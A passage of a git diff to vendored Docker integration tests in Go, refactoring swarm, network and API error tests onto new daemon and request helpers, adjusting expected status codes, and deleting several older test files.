waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + containers := d.ActiveContainers(c) instances = 4 - d.updateService(c, d.getService(c, id), setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - containers2 := d.activeContainers() + d.UpdateService(c, d.GetService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + containers2 := d.ActiveContainers(c) loop0: for _, c1 := range containers { @@ -964,17 +528,17 @@ func (s *DockerSwarmSuite) TestAPISwarmInvalidAddress(c *check.C) { req := swarm.InitRequest{ ListenAddr: "", } - status, _, err := d.SockRequest("POST", "/swarm/init", req) + res, _, err := request.Post("/swarm/init", request.Host(d.Sock()), request.JSONBody(req)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) req2 := swarm.JoinRequest{ ListenAddr: "0.0.0.0:2377", RemoteAddrs: []string{""}, } - status, _, err = d.SockRequest("POST", "/swarm/join", req2) + res, _, err = request.Post("/swarm/join", request.Host(d.Sock()), request.JSONBody(req2)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) } func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) { @@ -982,35 +546,34 @@ func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) { d2 := s.AddDaemon(c, true, true) instances := 2 - id := d1.createService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + id := d1.CreateService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) // drain d2, all containers should move to d1 - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Availability = swarm.NodeAvailabilityDrain }) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 0) - c.Assert(d2.Stop(), checker.IsNil) + d2.Stop(c) - c.Assert(d1.Init(swarm.InitRequest{ + d1.SwarmInit(c, swarm.InitRequest{ ForceNewCluster: true, Spec: swarm.Spec{}, - }), checker.IsNil) + }) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances) d3 := s.AddDaemon(c, true, true) - info, err := d3.info() - c.Assert(err, checker.IsNil) + info := d3.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) instances = 4 - d3.updateService(c, d3.getService(c, id), setInstances(instances)) + d3.UpdateService(c, d3.GetService(c, id), setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) } func simpleTestService(s *swarm.Service) { @@ -1019,7 +582,7 @@ func simpleTestService(s *swarm.Service) { s.Spec = swarm.ServiceSpec{ TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ + ContainerSpec: &swarm.ContainerSpec{ Image: "busybox:latest", Command: []string{"/bin/top"}, }, @@ -1042,7 +605,7 @@ func serviceForUpdate(s *swarm.Service) { s.Spec = swarm.ServiceSpec{ TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ + ContainerSpec: &swarm.ContainerSpec{ Image: "busybox:latest", Command: []string{"/bin/top"}, }, @@ -1060,11 +623,16 @@ func serviceForUpdate(s *swarm.Service) { Delay: 4 * time.Second, FailureAction: swarm.UpdateFailureActionContinue, }, + RollbackConfig: &swarm.UpdateConfig{ + Parallelism: 3, + Delay: 4 * time.Second, + FailureAction: swarm.UpdateFailureActionContinue, + }, } s.Spec.Name = "updatetest" } -func setInstances(replicas int) serviceConstructor { +func setInstances(replicas int) testdaemon.ServiceConstructor { ureplicas := uint64(replicas) return func(s *swarm.Service) { s.Spec.Mode = swarm.ServiceMode{ @@ -1075,31 +643,52 @@ func setInstances(replicas int) serviceConstructor { } } -func setImage(image string) serviceConstructor { +func setUpdateOrder(order string) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.UpdateConfig == nil { + s.Spec.UpdateConfig = &swarm.UpdateConfig{} + } + s.Spec.UpdateConfig.Order = order + } +} + +func setRollbackOrder(order string) testdaemon.ServiceConstructor { return func(s *swarm.Service) { + if s.Spec.RollbackConfig == nil { + s.Spec.RollbackConfig = &swarm.UpdateConfig{} + } + s.Spec.RollbackConfig.Order = order + } +} + +func setImage(image string) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.TaskTemplate.ContainerSpec == nil { + s.Spec.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{} + } s.Spec.TaskTemplate.ContainerSpec.Image = image } } -func setFailureAction(failureAction string) serviceConstructor { +func setFailureAction(failureAction string) testdaemon.ServiceConstructor { return func(s *swarm.Service) { s.Spec.UpdateConfig.FailureAction = failureAction } } -func setMaxFailureRatio(maxFailureRatio float32) serviceConstructor { +func setMaxFailureRatio(maxFailureRatio float32) testdaemon.ServiceConstructor { return func(s *swarm.Service) { s.Spec.UpdateConfig.MaxFailureRatio = maxFailureRatio } } -func setParallelism(parallelism uint64) serviceConstructor { +func setParallelism(parallelism uint64) testdaemon.ServiceConstructor { return func(s *swarm.Service) { s.Spec.UpdateConfig.Parallelism = parallelism } } -func setConstraints(constraints []string) serviceConstructor { +func setConstraints(constraints []string) testdaemon.ServiceConstructor { return func(s *swarm.Service) { if s.Spec.TaskTemplate.Placement == nil { s.Spec.TaskTemplate.Placement = &swarm.Placement{} @@ -1108,24 +697,34 @@ func setConstraints(constraints []string) serviceConstructor { } } +func setPlacementPrefs(prefs []swarm.PlacementPreference) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.TaskTemplate.Placement == nil { + s.Spec.TaskTemplate.Placement = &swarm.Placement{} + } + s.Spec.TaskTemplate.Placement.Preferences = prefs + } +} + func setGlobalMode(s *swarm.Service) { s.Spec.Mode = swarm.ServiceMode{ Global: &swarm.GlobalService{}, } } -func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount int) { +func checkClusterHealth(c *check.C, cl []*daemon.Daemon, managerCount, workerCount int) { var totalMCount, totalWCount int for _, d := range cl { var ( info swarm.Info - err error ) // check info in a waitAndAssert, because if the cluster doesn't have a leader, `info` will return an error checkInfo := func(c *check.C) (interface{}, check.CommentInterface) { - info, err = d.info() + client := d.NewClientT(c) + daemonInfo, err := client.Info(context.Background()) + info = daemonInfo.Swarm return err, check.Commentf("cluster not ready in time") } waitAndAssert(c, defaultReconciliationTimeout, checkInfo, checker.IsNil) @@ -1138,14 +737,14 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount totalMCount++ var mCount, wCount int - for _, n := range d.listNodes(c) { + for _, n := range d.ListNodes(c) { waitReady := func(c *check.C) (interface{}, check.CommentInterface) { if n.Status.State == swarm.NodeStateReady { return true, nil } - nn := d.getNode(c, n.ID) + nn := d.GetNode(c, n.ID) n = *nn - return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.Info.NodeID) + return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.NodeID()) } waitAndAssert(c, defaultReconciliationTimeout, waitReady, checker.True) @@ -1153,20 +752,20 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount if n.Spec.Availability == swarm.NodeAvailabilityActive { return true, nil } - nn := d.getNode(c, n.ID) + nn := d.GetNode(c, n.ID) n = *nn - return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.Info.NodeID) + return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.NodeID()) } waitAndAssert(c, defaultReconciliationTimeout, waitActive, checker.True) if n.Spec.Role == swarm.NodeRoleManager { - c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.Info.NodeID)) + c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.NodeID())) if n.ManagerStatus.Leader { leaderFound = true } mCount++ } else { - c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.Info.NodeID)) + c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.NodeID())) wCount++ } } @@ -1181,11 +780,10 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { mCount, wCount := 5, 1 - var nodes []*SwarmDaemon + var nodes []*daemon.Daemon for i := 0; i < mCount; i++ { manager := s.AddDaemon(c, true, true) - info, err := manager.info() - c.Assert(err, checker.IsNil) + info := manager.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) nodes = append(nodes, manager) @@ -1193,8 +791,7 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { for i := 0; i < wCount; i++ { worker := s.AddDaemon(c, true, false) - info, err := worker.info() - c.Assert(err, checker.IsNil) + info := worker.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) nodes = append(nodes, worker) @@ -1207,14 +804,11 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { errs := make(chan error, len(nodes)) for _, d := range nodes { - go func(daemon *SwarmDaemon) { + go func(daemon *daemon.Daemon) { defer wg.Done() - if err := daemon.Stop(); err != nil { + if err := daemon.StopWithError(); err != nil { errs <- err } - if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { - daemon.root = filepath.Dir(daemon.root) - } }(d) } wg.Wait() @@ -1231,9 +825,9 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { errs := make(chan error, len(nodes)) for _, d := range nodes { - go func(daemon *SwarmDaemon) { + go func(daemon *daemon.Daemon) { defer wg.Done() - if err := daemon.Start("--iptables=false"); err != nil { + if err := daemon.StartWithError("--iptables=false"); err != nil { errs <- err } }(d) @@ -1252,116 +846,189 @@ func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateWithName(c *check.C) { d := s.AddDaemon(c, true, true) instances := 2 - id := d.createService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + id := d.CreateService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) - service := d.getService(c, id) + service := d.GetService(c, id) instances = 5 setInstances(instances)(service) - url := fmt.Sprintf("/services/%s/update?version=%d", service.Spec.Name, service.Version.Index) - status, out, err := d.SockRequest("POST", url, service.Spec) + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + _, err = cli.ServiceUpdate(context.Background(), service.Spec.Name, service.Version, service.Spec, types.ServiceUpdateOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) } -func (s *DockerSwarmSuite) TestAPISwarmSecretsEmptyList(c *check.C) { +// Unlocking an unlocked swarm results in an error +func (s *DockerSwarmSuite) TestAPISwarmUnlockNotLocked(c *check.C) { d := s.AddDaemon(c, true, true) + err := d.SwarmUnlock(swarm.UnlockRequest{UnlockKey: "wrong-key"}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "swarm is not locked") +} - secrets := d.listSecrets(c) - c.Assert(secrets, checker.NotNil) - c.Assert(len(secrets), checker.Equals, 0, check.Commentf("secrets: %#v", secrets)) +// #29885 +func (s *DockerSwarmSuite) TestAPISwarmErrorHandling(c *check.C) { + ln, err := net.Listen("tcp", fmt.Sprintf(":%d", defaultSwarmPort)) + c.Assert(err, checker.IsNil) + defer ln.Close() + d := s.AddDaemon(c, false, false) + client := d.NewClientT(c) + _, err = client.SwarmInit(context.Background(), swarm.InitRequest{ + ListenAddr: d.SwarmListenAddr(), + }) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "address already in use") } -func (s *DockerSwarmSuite) TestAPISwarmSecretsCreate(c *check.C) { +// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`, +// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`. +// This test makes sure the fixes correctly output scopes instead. +func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) { d := s.AddDaemon(c, true, true) + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + name := "foo" + networkCreate := types.NetworkCreate{ + CheckDuplicate: false, + } - secrets := d.listSecrets(c) - c.Assert(len(secrets), checker.Equals, 1, check.Commentf("secrets: %#v", secrets)) - name := secrets[0].Spec.Annotations.Name - c.Assert(name, checker.Equals, testName, check.Commentf("secret: %s", name)) -} + networkCreate.Driver = "bridge" -func (s *DockerSwarmSuite) TestAPISwarmSecretsDelete(c *check.C) { - d := s.AddDaemon(c, true, true) + n1, err := cli.NetworkCreate(context.Background(), name, networkCreate) + c.Assert(err, checker.IsNil) - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + networkCreate.Driver = "overlay" - secret := d.getSecret(c, id) - c.Assert(secret.ID, checker.Equals, id, check.Commentf("secret: %v", secret)) + n2, err := cli.NetworkCreate(context.Background(), name, networkCreate) + c.Assert(err, checker.IsNil) - d.deleteSecret(c, secret.ID) - status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) + r1, err := cli.NetworkInspect(context.Background(), n1.ID, types.NetworkInspectOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound, check.Commentf("secret delete: %s", string(out))) + c.Assert(r1.Scope, checker.Equals, "local") + + r2, err := cli.NetworkInspect(context.Background(), n2.ID, types.NetworkInspectOptions{}) + c.Assert(err, checker.IsNil) + c.Assert(r2.Scope, checker.Equals, "swarm") } -// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`, -// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`. -// This test makes sure the fixes correctly output scopes instead. -func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) { +// Test case for 30178 +func (s *DockerSwarmSuite) TestAPISwarmHealthcheckNone(c *check.C) { + // Issue #36386 can be a independent one, which is worth further investigation. + c.Skip("Root cause of Issue #36386 is needed") d := s.AddDaemon(c, true, true) - name := "foo" - networkCreateRequest := types.NetworkCreateRequest{ - Name: name, - NetworkCreate: types.NetworkCreate{ - CheckDuplicate: false, - }, - } + out, err := d.Cmd("network", "create", "-d", "overlay", "lb") + c.Assert(err, checker.IsNil, check.Commentf(out)) - var n1 types.NetworkCreateResponse - networkCreateRequest.NetworkCreate.Driver = "bridge" + instances := 1 + d.CreateService(c, simpleTestService, setInstances(instances), func(s *swarm.Service) { + if s.Spec.TaskTemplate.ContainerSpec == nil { + s.Spec.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{} + } + s.Spec.TaskTemplate.ContainerSpec.Healthcheck = &container.HealthConfig{} + s.Spec.TaskTemplate.Networks = []swarm.NetworkAttachmentConfig{ + {Target: "lb"}, + } + }) - status, out, err := d.SockRequest("POST", "/networks/create", networkCreateRequest) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) - c.Assert(json.Unmarshal(out, &n1), checker.IsNil) + containers := d.ActiveContainers(c) - var n2 types.NetworkCreateResponse - networkCreateRequest.NetworkCreate.Driver = "overlay" + out, err = d.Cmd("exec", containers[0], "ping", "-c1", "-W3", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) +} - status, out, err = d.SockRequest("POST", "/networks/create", networkCreateRequest) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) +func (s *DockerSwarmSuite) TestSwarmRepeatedRootRotation(c *check.C) { + m := s.AddDaemon(c, true, true) + w := s.AddDaemon(c, true, false) + + info := m.SwarmInfo(c) + + currentTrustRoot := info.Cluster.TLSInfo.TrustRoot + + // rotate multiple times + for i := 0; i < 4; i++ { + var err error + var cert, key []byte + if i%2 != 0 { + cert, _, key, err = initca.New(&csr.CertificateRequest{ + CN: "newRoot", + KeyRequest: csr.NewBasicKeyRequest(), + CA: &csr.CAConfig{Expiry: ca.RootCAExpiration}, + }) + c.Assert(err, checker.IsNil) + } + expectedCert := string(cert) + m.UpdateSwarm(c, func(s *swarm.Spec) { + s.CAConfig.SigningCACert = expectedCert + s.CAConfig.SigningCAKey = string(key) + s.CAConfig.ForceRotate++ + }) - c.Assert(json.Unmarshal(out, &n2), checker.IsNil) + // poll to make sure update succeeds + var clusterTLSInfo swarm.TLSInfo + for j := 0; j < 18; j++ { + info := m.SwarmInfo(c) - var r1 types.NetworkResource + // the desired CA cert and key is always redacted + c.Assert(info.Cluster.Spec.CAConfig.SigningCAKey, checker.Equals, "") + c.Assert(info.Cluster.Spec.CAConfig.SigningCACert, checker.Equals, "") - status, out, err = d.SockRequest("GET", "/networks/"+n1.ID, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) + clusterTLSInfo = info.Cluster.TLSInfo - c.Assert(json.Unmarshal(out, &r1), checker.IsNil) + // if root rotation is done and the trust root has changed, we don't have to poll anymore + if !info.Cluster.RootRotationInProgress && clusterTLSInfo.TrustRoot != currentTrustRoot { + break + } - c.Assert(r1.Scope, checker.Equals, "local") + // root rotation not done + time.Sleep(250 * time.Millisecond) + } + if cert != nil { + c.Assert(clusterTLSInfo.TrustRoot, checker.Equals, expectedCert) + } + // could take another second or two for the nodes to trust the new roots after they've all gotten + // new TLS certificates + for j := 0; j < 18; j++ { + mInfo := m.GetNode(c, m.NodeID()).Description.TLSInfo + wInfo := m.GetNode(c, w.NodeID()).Description.TLSInfo + + if mInfo.TrustRoot == clusterTLSInfo.TrustRoot && wInfo.TrustRoot == clusterTLSInfo.TrustRoot { + break + } - var r2 types.NetworkResource + // nodes don't trust root certs yet + time.Sleep(250 * time.Millisecond) + } + + c.Assert(m.GetNode(c, m.NodeID()).Description.TLSInfo, checker.DeepEquals, clusterTLSInfo) + c.Assert(m.GetNode(c, w.NodeID()).Description.TLSInfo, checker.DeepEquals, clusterTLSInfo) + currentTrustRoot = clusterTLSInfo.TrustRoot + } +} - status, out, err = d.SockRequest("GET", "/networks/"+n2.ID, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) +func (s *DockerSwarmSuite) TestAPINetworkInspectWithScope(c *check.C) { + d := s.AddDaemon(c, true, true) - c.Assert(json.Unmarshal(out, &r2), checker.IsNil) + name := "test-scoped-network" + ctx := context.Background() + apiclient, err := d.NewClient() + assert.NilError(c, err) - c.Assert(r2.Scope, checker.Equals, "swarm") + resp, err := apiclient.NetworkCreate(ctx, name, types.NetworkCreate{Driver: "overlay"}) + assert.NilError(c, err) + + network, err := apiclient.NetworkInspect(ctx, name, types.NetworkInspectOptions{}) + assert.NilError(c, err) + assert.Check(c, is.Equal("swarm", network.Scope)) + assert.Check(c, is.Equal(resp.ID, network.ID)) + + _, err = apiclient.NetworkInspect(ctx, name, types.NetworkInspectOptions{Scope: "local"}) + assert.Check(c, client.IsErrNotFound(err)) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go index 3b38ba96f2..5b7e3e97f9 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go @@ -2,26 +2,27 @@ package main import ( "fmt" + "io/ioutil" "net/http" - "net/http/httptest" "runtime" "strconv" "strings" "github.com/docker/docker/api" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) func (s *DockerSuite) TestAPIOptionsRoute(c *check.C) { - status, _, err := sockRequest("OPTIONS", "/", nil) + resp, _, err := request.Do("/", request.Method(http.MethodOptions)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) } func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) { - res, body, err := sockRequestRaw("GET", "/version", nil, "") + res, body, err := request.Get("/version") c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) body.Close() @@ -33,7 +34,7 @@ func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) { } func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) { - if daemonPlatform != runtime.GOOS { + if testEnv.OSType != runtime.GOOS { c.Skip("Daemon platform doesn't match test platform") } if api.MinVersion == api.DefaultVersion { @@ -46,39 +47,26 @@ func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) { v[1] = strconv.Itoa(vMinInt) version := strings.Join(v, ".") - status, body, err := sockRequest("GET", "/v"+version+"/version", nil) + resp, body, err := request.Get("/v" + version + "/version") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) + defer body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusBadRequest) expected := fmt.Sprintf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", version, api.MinVersion) - c.Assert(strings.TrimSpace(string(body)), checker.Contains, expected) -} - -func (s *DockerSuite) TestAPIDockerAPIVersion(c *check.C) { - var svrVersion string - - server := httptest.NewServer(http.HandlerFunc( - func(w http.ResponseWriter, r *http.Request) { - w.Header().Set("API-Version", api.DefaultVersion) - url := r.URL.Path - svrVersion = url - })) - defer server.Close() - - // Test using the env var first - result := icmd.RunCmd(icmd.Cmd{ - Command: binaryWithArgs("-H="+server.URL[7:], "version"), - Env: appendBaseEnv(false, "DOCKER_API_VERSION=xxx"), - }) - c.Assert(result, icmd.Matches, icmd.Expected{Out: "API version: xxx", ExitCode: 1}) - c.Assert(svrVersion, check.Equals, "/vxxx/version", check.Commentf("%s", result.Compare(icmd.Success))) + content, err := ioutil.ReadAll(body) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(string(content)), checker.Contains, expected) } func (s *DockerSuite) TestAPIErrorJSON(c *check.C) { - httpResp, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(`{}`), "application/json") + httpResp, body, err := request.Post("/containers/create", request.JSONBody(struct{}{})) c.Assert(err, checker.IsNil) - c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusBadRequest) + } c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(getErrorMessage(c, b), checker.Equals, "Config cannot be empty in order to create a container") } @@ -87,32 +75,36 @@ func (s *DockerSuite) TestAPIErrorPlainText(c *check.C) { // Windows requires API 1.25 or later. This test is validating a behaviour which was present // in v1.23, but changed in 1.24, hence not applicable on Windows. See apiVersionSupportsJSONErrors testRequires(c, DaemonIsLinux) - httpResp, body, err := sockRequestRaw("POST", "/v1.23/containers/create", strings.NewReader(`{}`), "application/json") + httpResp, body, err := request.Post("/v1.23/containers/create", request.JSONBody(struct{}{})) c.Assert(err, checker.IsNil) - c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusBadRequest) + } c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(string(b)), checker.Equals, "Config cannot be empty in order to create a container") } func (s *DockerSuite) TestAPIErrorNotFoundJSON(c *check.C) { // 404 is a different code path to normal errors, so test separately - httpResp, body, err := sockRequestRaw("GET", "/notfound", nil, "application/json") + httpResp, body, err := request.Get("/notfound", request.JSON) c.Assert(err, checker.IsNil) c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(getErrorMessage(c, b), checker.Equals, "page not found") } func (s *DockerSuite) TestAPIErrorNotFoundPlainText(c *check.C) { - httpResp, body, err := sockRequestRaw("GET", "/v1.23/notfound", nil, "application/json") + httpResp, body, err := request.Get("/v1.23/notfound", request.JSON) c.Assert(err, checker.IsNil) c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(string(b)), checker.Equals, "page not found") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go deleted file mode 100644 index dfe14ec7b0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go +++ /dev/null @@ -1,35 +0,0 @@ -// +build !windows - -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestAPIUpdateContainer(c *check.C) { - testRequires(c, DaemonIsLinux) - testRequires(c, memoryLimitSupport) - testRequires(c, swapMemorySupport) - - name := "apiUpdateContainer" - hostConfig := map[string]interface{}{ - "Memory": 314572800, - "MemorySwap": 524288000, - } - dockerCmd(c, "run", "-d", "--name", name, "-m", "200M", "busybox", "top") - _, _, err := sockRequest("POST", "/containers/"+name+"/update", hostConfig) - c.Assert(err, check.IsNil) - - c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800") - file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" - out, _ := dockerCmd(c, "exec", name, "cat", file) - c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") - - c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000") - file = "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" - out, _ = dockerCmd(c, "exec", name, "cat", file) - c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go deleted file mode 100644 index eb2de5904a..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go +++ /dev/null @@ -1,23 +0,0 @@ -package main - -import ( - "encoding/json" - "net/http" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestGetVersion(c *check.C) { - status, body, err := sockRequest("GET", "/version", nil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(err, checker.IsNil) - - var v types.Version - - c.Assert(json.Unmarshal(body, &v), checker.IsNil) - - c.Assert(v.Version, checker.Equals, dockerversion.Version, check.Commentf("Version mismatch")) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go deleted file mode 100644 index d1d44005e0..0000000000 --- 